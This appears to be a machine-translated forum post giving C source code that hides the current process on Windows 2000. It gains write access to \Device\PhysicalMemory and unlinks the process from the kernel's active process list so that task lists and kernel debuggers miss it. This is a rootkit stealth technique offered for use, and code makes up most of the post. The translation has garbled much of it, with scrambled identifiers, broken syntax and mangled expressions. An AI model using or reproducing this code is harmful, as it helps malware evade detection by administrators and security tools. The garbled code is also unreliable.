I am very sorry, I have a bit bug in a hurry, "Zwopense", "Zwopense | section_map_write, & attributes" makes the first run return failure, please delete the original text, correct to:
PJF (jfpan20000@sina.com)
The last time I mentioned this thing, because it is very simple to think that there is no need to say more, but someone is required to write, so add a few words:
Many posts have analyzed this, such as APIHOOK, system service hook, etc.
Here you write a completely hidden method of 2000, it is very simple, there is no new idea.
Before explanation, first mention some structures, there are several processes related chains in the process enforcement block, one of which is the active process chain. One of the important roles of this chain is to query the system information for traversing the current activity process. It is interesting that M $ may not use it due to efficiency factors, which does not take advantage of the process of transition, etc., Further, it is not necessary to have a problem that cannot be ignored (this is the foundation of this program).
How to do it is obvious, delete the process you want to have in the bidirectional chain of the activity process or the core debugger (such as Softice / Proc) can not be found.
The code for hiding the current process under 2000 is as follows:
#include
#define nt_success (status) (status)> = 0) #define status_info_length_mismatch ((ntstatus) 0xc000000004L) #define status_access_denied ((ntstatus) 0xc0000022L)
Typedef long ntstatus; typedef struct _io_status_block {ntstatus status; ulong information;}} o_status_block, * pio_status_block;
Typedef struct _unicode_string {ushort length; ushort maximumlength; pwstr buffer;} unicode_string, * punicode_string;
#define OBJ_INHERIT 0x00000002L #define OBJ_PERMANENT 0x00000010L #define OBJ_EXCLUSIVE 0x00000020L #define OBJ_CASE_INSENSITIVE 0x00000040L #define OBJ_OPENIF 0x00000080L #define OBJ_OPENLINK 0x00000100L #define OBJ_KERNEL_HANDLE 0x00000200L #define OBJ_VALID_ATTRIBUTES 0x000003F2L
typedef struct _OBJECT_ATTRIBUTES {ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService;} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; typedef NTSTATUS (CALLBACK * ZWOPENSECTION) (OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes);
TypedEf void (Callback * RTLinitUnicodeString) (In Out Punicode_String DestinationString, In Pcwstr SourceString);
RtlinitunicodeString; zwopensection zwopense; hModule g_hntdll = null; pvoid g_pmapphysicalmemory = null; handle g_hmpm = null;
Bool initddll () {g_hntdll = loadingLibrary ("ntdll.dll"); if (! G_hntdll) {return false;}
RtlInitUnicodeString = (RTLINITUNICODESTRING) GetProcAddress (g_hNtDLL, "RtlInitUnicodeString"); ZwOpenSection = (ZWOPENSECTION) GetProcAddress (g_hNtDLL, "ZwOpenSection"); return TRUE;}
Void Closentdll () {if (g_hntdll! = Null) {freeelibrary (g_hntdll);}}
VOID SetPhyscialMemorySectionCanBeWrited (HANDLE hSection) {PACL pDacl = NULL; PACL pNewDacl = NULL; PSECURITY_DESCRIPTOR pSD = NULL; DWORD dwRes; EXPLICIT_ACCESS ea; if (dwRes = GetSecurityInfo (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, & pDacl, NULL, & pSD) ! = ERROR_SUCCESS) {goto CleanUp;} ZeroMemory (& ea, sizeof (EXPLICIT_ACCESS)); ea.grfAccessPermissions = SECTION_MAP_WRITE; ea.grfAccessMode = GRANT_ACCESS; ea.grfInheritance = NO_INHERITANCE; ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME; ea.Trustee.TrusteeType = TRUSTEE_IS_USER; ea.Trustee.ptstrName = "CURRENT_USER"; if (! dwRes = SetEntriesInAcl (1, & ea, pDacl, & pNewDacl) = ERROR_SUCCESS) {goto CleanUp;} if (dwRes = SetSecurityInfo (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, PNEWDACL, NULL)! = Error_Success) {goto cleanup;} Cleanup: IF (PSD) LocalFree (PSD); if (PNewDACL) LocalFree (PNEWDACL);
HANDLE OpenPhysicalMemory () {NTSTATUS status; UNICODE_STRING physmemString; OBJECT_ATTRIBUTES attributes; RtlInitUnicodeString (& physmemString, L "// Device // PhysicalMemory"); attributes.Length = sizeof (OBJECT_ATTRIBUTES); attributes.RootDirectory = NULL; attributes.ObjectName = & physmemString; attributes.Attributes = 0; attributes.SecurityDescriptor = NULL; attributes.SecurityQualityOfService = NULL; status = ZwOpenSection (& g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, & attributes); if (status == STATUS_ACCESS_DENIED) {status = ZwOpenSection (& g_hMPM, READ_CONTROL | WRITE_DAC, & attributes ); SetPhyscialMemorySectionCanBeWrited (g_hMPM); CloseHandle (g_hMPM); status = ZwOpenSection (& g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, & attributes);!} if (NT_SUCCESS (status)) {return NULL;} g_pMapPhysicalMemory = MapViewOfFile (g_hMPM, 4, 0, 0x30000 , 0x1000); if (g_pmapphysicalmemory == null ) {RETURN NULL;} Return G_HMPM;
PVOID LinearToPhys (PULONG BaseAddress, PVOID addr) {ULONG VAddr = (ULONG) addr, PGDE, PTE, PAddr; PGDE = BaseAddress [VAddr >> 22]; if ((PGDE & 1) = 0!) {ULONG tmp = PGDE & 0x00000080; if (TMP! = 0) {PADDR = (pgde & 0xffc00000) (VADDR & 0x003FFFF);} else {pgde = (ulong) MapViewOffile (g_hmpm, 4, 0, pgde & 0xffff000, 0x1000); PTE = ((pulong) PGDE) [ vAddr & 0x003FF000) >> 12]; if ((PTE & 1) = 0) {PAddr = (PTE & 0xFFFFF000) (vAddr & 0x00000FFF); UnmapViewOfFile ((PVOID) PGDE);}! else return 0;}} else return 0; return (PVOID) Paddr;}
ULONG GetData (PVOID addr) {ULONG phys = (ULONG) LinearToPhys ((PULONG) g_pMapPhysicalMemory, (PVOID) addr); PULONG tmp = (PULONG) MapViewOfFile (g_hMPM, 4, 0, phys & 0xfffff000, 0x1000); if (tmp == 0) Return 0; Ulong Ret = TMP [(PHYS & 0xFFF) >> 2]; unmapViewoffile (TMP); return ret;}
BOOL SetData (PVOID addr, ULONG data) {ULONG phys = (ULONG) LinearToPhys ((PULONG) g_pMapPhysicalMemory, (PVOID) addr); PULONG tmp = (PULONG) MapViewOfFile (g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000); IF (TMP == 0) Return False; TMP [(PHYS & 0xFFF) >> 2] = data; unmapViewoffile (TMP); Return True;}
BOOL HideProcessAtAll () {if (InitNTDLL ()) {if (OpenPhysicalMemory () == 0) {return FALSE;} ULONG thread = GetData ((PVOID) 0xFFDFF124); ULONG process = GetData (PVOID (thread 0x22c)); Ulong fw = getdata (PVOID (Process 0xA0)), BW = getData (PVOID (PVOID (FW 4), BW); SetData (PVOID (BW), FW); UnmapViewoffile (g_pmapphysicalmemory CLOSEHANDLE (G_HMPM); closentdll ();} returntrue;} Call hideProcessatall hides the current process, if you hide, you will modify the process activity chain head, you may have some small problems after running for a while, how to resolve, stay "After class posts" ^ _ ^
Note that the default physical address 0x30000 is a page directory, in most cases, but there is exception! How to solve it also left "...", not much nonsense.
A slightly changed offset can be ported in NT / XP / 2003.
